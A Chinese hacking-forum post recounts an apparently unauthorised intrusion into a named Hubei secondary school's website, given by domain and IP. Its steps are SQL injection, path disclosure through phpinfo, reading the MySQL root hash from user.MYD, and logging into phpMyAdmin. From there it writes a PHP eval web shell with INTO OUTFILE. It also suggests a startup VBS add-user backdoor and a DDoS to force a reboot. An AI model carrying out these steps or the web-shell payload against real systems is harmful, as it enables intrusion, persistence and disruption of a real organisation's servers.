找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 友情检测湖北省大治市第一中学
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2495|回复: 1
打印 上一主题 下一主题

友情检测湖北省大治市第一中学

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-11 21:32:15 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏3 M1 U; C/ _5 q
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入!
- S# |$ u( M& H0 O, h' d! K% }. F6 L/ o( l3 [- w

7 M- O5 }4 v1 M' x! H9 \" W# M- @/ r, x' z
常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 / o# j) L; J3 T3 O8 ?: E; H/ n
9 N8 r1 g& C9 w1 ~1 q4 ^
那么想可以直接写入shell ,getshell有几个条件:
8 V- v* C6 _) I  _) [2 H
1、知道站点物理路径
2、有足够大的权限
3、magic_quotes_gpc()=OFF6 K5 a0 n7 E1 |" @
7 h; ~$ p9 d1 [/ K& ?1 n, ]% l
试着爆绝对路径:2 K( B3 k& P( W" }  r- g8 b
1./phpMyAdmin/index.php?lang[]=1  
( C* B# H. S* U9 X# Q2./phpMyAdmin/phpinfo.php  1 |5 |! V" v( ~/ d+ [
3./load_file()  2 R+ E% `% t  V% F9 ]( ?0 W
4./phpmyadmin/themes/darkblue_orange/layout.inc.php    w1 {* }! T$ s* w( i7 s) V
5./phpmyadmin/libraries/select_lang.lib.php  
* C/ p2 w( U- h2 z! C3 P& |6 ~6./phpmyadmin/libraries/lect_lang.lib.php  1 @/ |( B# l8 R0 W) c- f! I
7./phpmyadmin/libraries/mcrypt.lib.php   * u0 l/ s% Z6 R9 {8 ~  d4 _
8./phpmyadmin/libraries/export/xls.php  % k! i/ M5 w. _$ Y2 I- a/ ?/ |: M
; d$ Z6 s& R9 t! B% k5 q9 G% H0 W
均不行...........................1 E+ h+ C. }3 Z8 k

3 z7 z7 I$ U1 ^0 J8 \0 T5 L; _, [御剑扫到这个:http://www.dyyz.net.cn//phpinfo.php       获得网站路径:D:/www/phpinfo.php
  N9 f9 B7 j1 }: G1 F7 G2 U
* S4 ^' h. g$ L- ~4 C权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
$ x  S' y# M/ w( g+ @4 l. D' c1 A7 f0 O3 w6 k" j. ?
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败" ^. c3 c$ f5 d8 r

; O: M( s# C; ~0 N, S* h敏感东西:http://202.103.49.66/Admincp.php  社工进不去...........7 k1 ?% a2 M- Y

& w1 @6 M. C: o. ^+ L' I想想root还可以读,读到root密码进phpmyadmin 也可以拿shell 2 s. l0 G. ]5 f  B
4 e2 `  e* }3 a5 Y
http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini 6 [2 [9 M* U# y
7 G$ {; Z$ S2 m3 V7 a
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD " [. |# ^5 Y5 b0 R  T& a
' |5 m: w+ s2 e
成功读到root密码:) i) {" @% G$ @% N- ^, }
; ^, c4 ?5 p5 p# C- {7 M4 J1 e
17---- r(0072)2 x4 d/ _+ Z, B* [7 L
18---- o(006f)& ~, ]9 K1 x% Q
19---- o(006f); O( O9 B+ G# i# u1 G) Y" d
20---- t(0074), t) |8 o$ i0 N4 K0 k
21---- *(002a)* s/ Y5 U7 p) l# _$ R
22---- 8(0038)9 u, P* G- L7 ]* D! p( t
23---- 2(0032). E8 t9 _' S$ a* o# D- ~5 M9 _
24---- E(0045)
/ c2 I: S( _, o% s4 N$ I( R: B25---- 1(0031)+ \0 n' [( k3 d2 X0 D7 a# _
26---- C(0043)( n/ R& e, T/ [; ^2 S6 F
27---- 5(0035)
. w  c4 M$ Y6 Z( Q. t  d4 p28---- 8(0038)
% @' E% Y& {& p: g29---- 2(0032)
& E+ V7 J7 l' n0 T# @30---- 8(0038)
$ v& E2 M  m: `31---- A(0041)/ K4 x+ i. a. s/ X
32---- 9(0039)  C8 u* o/ v+ {1 q# W; D
33---- B(0042)0 O+ C1 G# W% T* s' M  T
34---- 5(0035)( _  D. D7 B0 G7 w# @
35---- 4(0034)" ~5 o# v- s9 o: P$ ]
36---- 8(0038)
9 {& k- @4 J1 J$ E37---- 6(0036)
1 N# v$ T$ D& h; j+ A38---- 4(0034)
* q7 T. }8 S5 C2 b6 [39---- 9(0039)8 b/ B2 U  a* W. S% ]' h# H; q% v
40---- 1(0031)
7 w& U/ N8 L& l% d41---- 1(0031)) x+ N6 f2 f  [2 p
42---- 5(0035)
* y4 Z, Q4 C# U9 F6 Z+ l. {4 d43---- 3(0033): D- B% Y3 s+ R& x. b/ l
44---- 5(0035)+ o7 Y$ U1 ]  g* R- M9 J
45---- 9(0039)
; x9 D7 h5 }* T2 V46---- 8(0038)) c3 |9 N% W& s
47---- F(0046)
3 @# {/ K$ p) V8 a+ Y# B48---- F(0046)
+ R% ?! J7 [  P6 u9 |: W49---- 4(0034)1 v2 v+ }& ^. q7 q% o9 a* Q  s; s
50---- F(0046)& U+ g- Q! r* Q" L# [% l) R
51---- 0(0030)3 W0 w3 `0 c, p! S2 g; G
52---- 3(0033)
  P6 c; Z$ J! A! `53---- 2(0032)
; l  o* r' c! ~54---- A(0041); L+ k* G2 S( G) d. @
55---- 4(0034); s# t; S( H& c+ T
56---- A(0041)
2 ]6 C5 g' d& @- \6 e$ L3 t57---- B(0042)  p$ f  e' W8 D
58---- *(0044)- U7 W$ o. y" h- O; k
59---- *(0035), P. ]; X6 o- O
60---- *(0041)
' C/ {) R, U, M61---- *0032)% t( F! h  t0 W8 E8 i6 c3 e, p! @! V4 A

! K" @" a$ e6 n1 X; t* o解密后成功登陆phpmyamin6 z! e: x7 B  I! I+ e
                          
3 Y( L5 H. e' s2 E4 o
7 q/ b' N. C" C/ n) V! U                             2 o" k/ \% o: e: l1 Z
$ ^4 i1 A# _4 r* j; g/ ~5 Y
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'0 o! A; g3 v" f% U+ j
; i# Y! W8 d3 J3 D7 }! w
成功执行,拿下shell,菜刀连接:
: d* C) A! i: X. X& l" }$ M7 f) l
7 I/ X! y: q$ D  J服务器不支持asp,aspx,php提权无果...................
& `% |4 Q* b8 A7 n+ y' F6 N9 ?1 s/ D$ `& C2 q3 N
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:5 H% [" G( p' R4 t+ y) {
服务器上已经有个隐藏帐号了
' }7 Y  N* H2 o4 ]9 }
别名     administrators1 }9 Y. u! t1 X5 o* u
注释     管理员对计算机/域有不受限制的完全访问权

& o3 w8 S% X. Y1 `' o+ ?5 L
成员

9 i' V# Q9 S. C  c' ?  o
-------------------------------------------------------------------------------' d. ?, K  |( w* A  U3 B0 n1 ~, e3 {
admin
& ~6 w  \5 F6 n+ ~# NAdministrator
7 z5 ]0 b: s! H7 Q2 d4 Sslipper$* S4 G1 r! ?# l) [' C) Y
sqluser4 e9 }: m. e/ P; Q& p2 P4 F
命令成功完成。 ; U7 F: {% @; ]$ T1 C
( d; f$ B2 n5 X! L" u4 y
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。
! z8 {3 A$ W+ j  t4 C0 Z- W! o0 ~/ W' C& L9 w
ddos服务器重启,不然就只能坐等服务器重启了...............................
7 C6 h6 @+ d" d7 o: O' z7 L, }) f1 b) J0 a6 {. H5 V
      

' W8 i+ ^* P  B# x0 k

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

angel
沙发
发表于 2013-5-20 15:28:12 | 只看该作者
回复 支持 反对

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表